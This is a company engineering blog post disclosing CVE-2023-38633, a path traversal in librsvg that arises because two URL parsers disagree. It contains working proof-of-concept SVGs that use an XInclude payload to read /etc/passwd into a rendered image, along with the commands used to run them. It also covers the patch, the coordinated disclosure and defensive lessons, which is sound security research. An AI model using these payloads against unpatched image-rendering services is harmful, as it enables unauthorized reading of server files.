Security

When URL parsers disagree (CVE-2023-38633)

Discovery and walkthrough of CVE-2023-38633 in librsvg, when two URL parser implementations (Rust and Glib) disagree on file scheme parsing leading to path traversal.


Zac Sims

As part of Canva's ongoing mission to build the world's most trusted platform, we continuously evaluate the security of our software dependencies. Identifying and resolving vulnerabilities in third-party dependencies helps improve the security of Canva, as well as the wider internet. Coupled with security controls like sandboxing, we continue to make it increasingly difficult for attackers to reach their objectives by exploiting third-party dependencies.

One such dependency Canva uses is librsvg(opens in a new tab or window) (via libvips(opens in a new tab or window)). We use librsvg to quickly render user-provided SVGs into thumbnails later displayed as PNGs. By exploiting differences in URL parsers when rendering an SVG with librsvg, we showed it's possible to include arbitrary files from disk in the resulting image. The librsvg maintainers quickly patched the issue(opens in a new tab or window) and issued a security vulnerability (CVE-2023-38633(opens in a new tab or window)).

We're sharing this research as another example of the dangers of mixing URL parsers(opens in a new tab or window), especially because the example we discovered is very subtle.

A special thanks to Federico (librsvg maintainer), John (libvips maintainer), and Lovell (Sharp(opens in a new tab or window) maintainer) for their work and excellent coordinated response.

Prequel

The XML Parsing Issues in Inkscape in CLI(opens in a new tab or window) write-up from Elttam's Victor Kahan shows how Inkscape is vulnerable to path traversal when rendering SVGs. Extending Victor's research, we found that while XInclude wasn't directly supported in Inkscape 0.9, it exhibited some interesting behavior when an SVG was nested in another SVG.

For example, consider the following inner SVG.

<?xml version="1.0" encoding="UTF-8" standalone="no" ?>
<svg width="300" height="300" xmlns:xi="http://www.w3.org/2001/XInclude">
<rect width="300" height="300" style="fill:rgb(255,204,204);" />
<text x="0" y="100">
<xi:include href="/etc/passwd" parse="text" encoding="ASCII">
<xi:fallback>file not found</xi:fallback>
</xi:include>
</text>
</svg>
XML

We encoded it as a URI and placed it inside another SVG, outer.svg.

<?xml version="1.0" encoding="UTF-8" standalone="no" ?>
<svg width="300" height="300" xmlns:xlink="http://www.w3.org/1999/xlink">
<image
xlink:href="data:image/svg;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiIHN0YW5kYWxvbmU9Im5vIj8+Cjxzdmcgd2lkdGg9IjMwMCIgaGVpZ2h0PSIzMDAiIHhtbG5zOnhpPSJodHRwOi8vd3d3LnczLm9yZy8yMDAxL1hJbmNsdWRlIj4KICA8cmVjdCB3aWR0aD0iMzAwIiBoZWlnaHQ9IjMwMCIgc3R5bGU9ImZpbGw6cmdiKDI1NSwyMDQsMjA0KTsiIC8+CiAgPHRleHQgeD0iMCIgeT0iMTAwIj4KICAgIDx4aTppbmNsdWRlIGhyZWY9Ii9ldGMvcGFzc3dkIiBwYXJzZT0idGV4dCIgZW5jb2Rpbmc9IkFTQ0lJIj4KICAgICAgPHhpOmZhbGxiYWNrPmZpbGUgbm90IGZvdW5kPC94aTpmYWxsYmFjaz4KICAgIDwveGk6aW5jbHVkZT4KICA8L3RleHQ+Cjwvc3ZnPg=="
/>
</svg>
XML

When run with Inkscape 0.92.4, it produced an image where the XInclude fallback was triggered.

$ inkscape -f test.svg -e out.png -w 300
SHELL

File not found

The fact that Xinclude was supported at all was surprising because it can often lead to security vulnerabilities. While Inkscape isn't used by the Canva product, digging into the Inkscape code path(opens in a new tab or window) showed that nested images are loaded with GdkPixbuf(opens in a new tab or window), which itself delegates SVG loading to librsvg(opens in a new tab or window). This was of great interest because librsvg is something that Canva does use.

XInclude

XInclude(opens in a new tab or window) is a mechanism for merging XML documents, which can lead to security vulnerabilities when a user-provided XML document (like an SVG) is assembled or rendered on a server.

Xinclude example

There are two standout elements in XInclude:

  • xi:include to include contents of a referenced URL, such as a file or HTTP request. The content being included can be plaintext or XML.
  • xi:fallback to nominate content that should be rendered when the referenced content can't be loaded by xi:Include.

Security checks aside, the following XML document loads the contents of /etc/passwd when processed.

<?xml version="1.0" encoding="UTF-8" standalone="no" ?>
<example xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include href="/etc/passwd" parse="text" encoding="ASCII">
<xi:fallback>file not found</xi:fallback>
</xi:include>
</example>
XML

There are rules

librsvg is a Rust library to render SVG images to Cairo(opens in a new tab or window) surfaces. Most of the heavy lifting is now implemented in Rust, but the library relies on the Cairo and GNOME glib C libraries.

Librsvg overview

From the prequel, we knew librsvg supported at least some of the XInclude standards. To understand how much, we dug into its implementation(opens in a new tab or window). As it turns out, every external URL reference in an SVG passes through a single method for validation. This includes references such as:

  • <image href="file:///something.png" />
  • <rect filter="url('file-with-filters.svg#my_filter')" />
  • <xi:include href="/etc/passwd" ... />

The librsvg url_resolver.resolve_href(opens in a new tab or window) method implements some strict security checks(opens in a new tab or window) to restrict what references can be loaded when processing an SVG document:

  • All data: URLs are permitted because they can't reference external files by design.
  • The referenced scheme must match the "current document" scheme. For example, when processing file:///foo/bar/example.svg, any encountered URL must be of the file: scheme.
  • Encountered files must be in the same directory as the current document, or within a subdirectory of the current document. This is enforced by checking the URL path(opens in a new tab or window).
  • All other schemes are rejected, including http:.

These strict rules are the reason our earlier naive XInclude tests failed. But we were very interested to see if we could bypass the rules. This could result in path traversal when processing an SVG, for example, being able to include files like /etc/passwd in the contents of the rendered SVG to PNG.

Parser Mismatch

Resolving a URL within an SVG document has two steps:

  1. Validate the URL as per the resolve rules mentioned earlier.
  2. If successful, load the contents(opens in a new tab or window), which parses URLs using Gio(opens in a new tab or window)'s inbuilt URI parser.

Excerpts from mod.rs(opens in a new tab or window) and io.rs(opens in a new tab or window) are as follows.

// xml/mod.rs
fn acquire(&self, href: Option<&str>, /* ... */) -> Result<(), AcquireError> {
let aurl = self.url_resolver.resolve_href(href) // ...
// ...
self.acquire_text(&aurl, encoding);
}
fn acquire_text(&self, aurl: &AllowedUrl, encoding: Option<&str>) -> Result<(), AcquireError> {
let binary = io::acquire_data(aurl, None);
// ...
return result;
}
// io.rs
pub fn acquire_data(aurl: &AllowedUrl, /* ... */) -> Result<BinaryData, IoError> {
let uri = aurl.as_str();
// ...
let file = GFile::for_uri(uri);
let (contents, _etag) = file.load_contents(cancellable)?;
// ...
return contents;
// ...
}
RUST

Knowing there were two URL parsers at play (one to validate the URL and one to load the contents), to bypass the security checks, we needed to find URLs where the parsers disagreed.

With some quick tests, we mapped out how the URL parsers process different URLs.

URL
file:///etc/passwd?foo=bar#baz
Rust url parsed result
Scheme
file
Host
None
Path
/etc/passwd
Query
foo=bar
Fragment
baz

Gio(opens in a new tab or window) doesn't expose generic URL parsing (aside from GUri, which isn't on the callpath). But g_filename_from_uri returns on some examples.

URL
g_filename_from_uri result
file:///etc/passwd?foo=bar#baz
/etc/passwd?foo=bar#baz
Note: As of Glib commit 3986471(opens in a new tab or window), this now fails because of ? and # characters.
file:///etc/passwd
/etc/passwd
file:///etc/passwd&hello
/etc/passwd&hello
file:///etc/passwd@host
/etc/passwd@host
file://host/etc/passwd
/etc/passwd

Bypassing Validation

Given this understanding of where the URL parsers were at, we took the relevant parts from librsvg and set up a fuzzing harness ("resolve") to run the same logic as the resolve URL logic when encountering a reference (href, XInclude, etc.) from an on-disk "current.svg" file. This allowed us to quickly test and fuzz inputs to see how the parsers and validation logic were evaluated. Some interesting outputs from fuzzing were as follows:

  • resolve 'current.svg': Passes as expected.
  • resolve run '../../../../../../../etc/passwd': Canonicalization fails with 'No such file or directory'.
  • resolve 'current.svg?../../../../../../../etc/passwd': Passes.
  • resolve 'none/../current.svg': Passes as expected.

The last 2 results showed us that GFile::for_uri happily resolves path traversals, including path traversals in the query string. However, the second result, ../../../../../../../etc/passwd, failed because of the canonicalization check.

Bypassing Canonicalization

Part of librsvg's URL validation is to canonicalize the built URL to replace .. and . segments per regular filesystem path rules. It does this using Rust's std::fs::canonicalize(opens in a new tab or window) (calling realpath(opens in a new tab or window)), which throws an error if:

  • The path doesn't exist.
  • A non-final component in the path isn't a directory.

Because we don't always know the name of the 'current' SVG on disk, we needed to bypass canonicalization if we wanted to have a URL pass librsvg's validation. After some rapid testing, it turns out this is relatively straightforward.

$ realpath current.svg
/home/zsims/projects/librsvg-poc/current.svg
$ realpath .
/home/zsims/projects/librsvg-poc/
SHELL

As it turns out, realpath(".") and std::fs::canonicalize(".") both return the "current directory". We can use this as a placeholder in our PoC instead of current.svg.

Proof of concept

Knowing how the URL parsers mismatch, and how we can bypass canonicalization without knowing the current file name, we can build a payload to include /etc/passwd.

.?../../../../../../../etc/passwd

Within a poc.svg SVG, this looks like the following.

<?xml version="1.0" encoding="UTF-8" standalone="no" ?>
<svg width="300" height="300" xmlns:xi="http://www.w3.org/2001/XInclude">
<rect width="300" height="300" style="fill:rgb(255,204,204);" />
<text x="0" y="100">
<xi:include
href=".?../../../../../../../etc/passwd"
parse="text"
encoding="ASCII"
>
<xi:fallback>file not found</xi:fallback>
</xi:include>
</text>
</svg>
XML

And produces the following result.

$ rsvg-convert poc.svg > poc.png

Proof of concept

We get a similar result when running through vipsthumbnail.

Sensitive files within /proc, such as /proc/self/environ, failed because of character encoding.

$ rsvg-convert proc-poc.svg > proc-poc.png
thread 'main' panicked at 'str::ToGlibPtr<*const c_char>: unexpected '' character: NulError(21...

Note that this PoC only works where the SVG is loaded from a file://. SVGs loaded through data: or resource: schemes are not vulnerable.

Patch

Following the report to librsvg's maintainer (see Issue 996(opens in a new tab or window)), Federico patched the issue(opens in a new tab or window) to add improved URL validation and use the validated URL as input into GFile. Part of the response from Federico included a heads-up to maintainers of Sharp and libvips to upgrade before the issue was disclosed publicly as CVE-2023-38633(opens in a new tab or window).

The issue also prompted some discussion about file URL parsing in glib(opens in a new tab or window), resulting in some additional validation(opens in a new tab or window) in the library.

There were a few standouts from discovery and patching:

  • The dangers of mixing URL parsers(opens in a new tab or window) are just as applicable to file:// URLs and in-process use as they are for networked services and http:// URLs.
  • file:// URLs are special. For example, the URL specification highlights support for query strings in file://(opens in a new tab or window) URLs, but the support in the implementations we reviewed varied greatly.
  • Efforts to migrate existing C code to Rust are not without risk. Although memory safety is much improved, differences in contracts (like URL parsing) can have negative security consequences.
  • Make sure you're only parsing URLs once, and using that parsed value from that point onwards.
  • If possible, enforce your own validation on files, like SVGs, before processing further. This is the reason MediaWiki(opens in a new tab or window) is not impacted by this issue because xi:include elements are rejected before the SVG reaches librsvg.

Timeline

Interested in securing Canva systems? Join Us!(opens in a new tab or window)

Subscribe to the Canva Engineering Blog

By submitting this form, you agree to receive Canva Engineering Blog updates. Read our Privacy Policy(opens in a new tab or window).
* indicates required